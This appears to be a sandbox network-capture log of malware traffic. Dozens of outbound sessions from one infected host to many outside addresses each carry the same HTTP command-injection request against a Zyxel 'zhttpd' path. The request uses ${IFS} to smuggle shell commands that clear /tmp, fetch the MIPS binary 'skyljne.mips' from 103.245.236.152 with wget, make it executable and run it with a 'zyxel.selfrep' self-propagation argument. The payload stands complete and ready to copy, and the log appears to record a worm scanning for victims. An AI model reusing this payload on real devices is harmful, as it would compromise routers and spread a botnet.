                                        Jan 14, 2024 16:18:31.147316933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        715192.168.2.1333326168.74.212.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147372961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        716192.168.2.1341240222.183.24.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147398949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        717192.168.2.1336346160.221.33.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147442102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        718192.168.2.1352054131.245.74.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147473097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        719192.168.2.133566272.177.207.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147552013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        720192.168.2.1356680123.125.118.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147582054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        721192.168.2.134239486.1.152.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147603989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        722192.168.2.1336998218.54.76.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147644043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        723192.168.2.1346782196.134.201.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147716045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        724192.168.2.1357546184.148.94.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147742033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        725192.168.2.1351776106.112.183.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147787094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        726192.168.2.135522440.78.50.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147830963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        727192.168.2.133403259.145.54.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147865057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        728192.168.2.135735461.31.117.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147910118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        729192.168.2.1336946180.204.36.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147950888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        730192.168.2.1359884102.138.96.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147979021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        731192.168.2.135050842.114.144.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148006916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        732192.168.2.1339114207.45.247.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148089886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        733192.168.2.1344146106.224.111.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148127079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        734192.168.2.135301018.250.74.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148153067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        735192.168.2.1357916135.214.135.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148206949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        736192.168.2.1359670143.45.173.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148243904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        737192.168.2.1348452190.61.52.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148284912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        738192.168.2.133858819.162.74.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148332119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        739192.168.2.1341660161.113.242.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148384094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        740192.168.2.1353030190.100.198.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148408890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        741192.168.2.1358376222.17.224.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148430109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        742192.168.2.1359604174.154.183.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148478985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        743192.168.2.134743484.35.20.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148530006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        744192.168.2.1358950167.136.200.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148566961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        745192.168.2.1346072138.50.152.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148613930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        746192.168.2.135587060.48.135.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148657084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        747192.168.2.134902614.163.91.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148724079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        748192.168.2.133554675.174.144.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148771048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        749192.168.2.1341300111.235.207.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148802996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        750192.168.2.1355902220.216.114.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148859024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        751192.168.2.135622267.163.125.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148905039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        752192.168.2.133426099.105.214.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148962021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        753192.168.2.1343066173.240.105.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.148993015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        754192.168.2.1345312102.28.169.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149041891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        755192.168.2.1360778111.161.163.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149107933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        756192.168.2.133524034.129.194.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149137020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        757192.168.2.1342450145.90.251.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149183989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        758192.168.2.133899665.72.160.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149209976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        759192.168.2.1353194183.119.65.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149261951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        760192.168.2.134169445.155.10.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149295092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        761192.168.2.13510629.194.229.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149358988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        762192.168.2.135459223.104.79.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149379969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        763192.168.2.1334506202.238.53.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149444103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        764192.168.2.135993873.31.16.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149461031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        765192.168.2.1355798171.14.237.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149568081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        766192.168.2.135840860.75.48.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149585962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        767192.168.2.1334434106.153.52.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149590015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        768192.168.2.134888850.141.250.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149625063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        769192.168.2.134507266.135.244.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149676085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        770192.168.2.1338084202.168.32.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149712086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        771192.168.2.1352940135.241.218.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149754047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        772192.168.2.135694690.237.237.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149808884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        773192.168.2.1354232198.159.188.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149847984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        774192.168.2.1333068120.125.253.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149892092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        775192.168.2.1350568176.126.146.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149925947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        776192.168.2.135967427.11.166.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.149966002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        777192.168.2.135277288.111.104.158443
                                        TimestampBytes transferredDirectionData
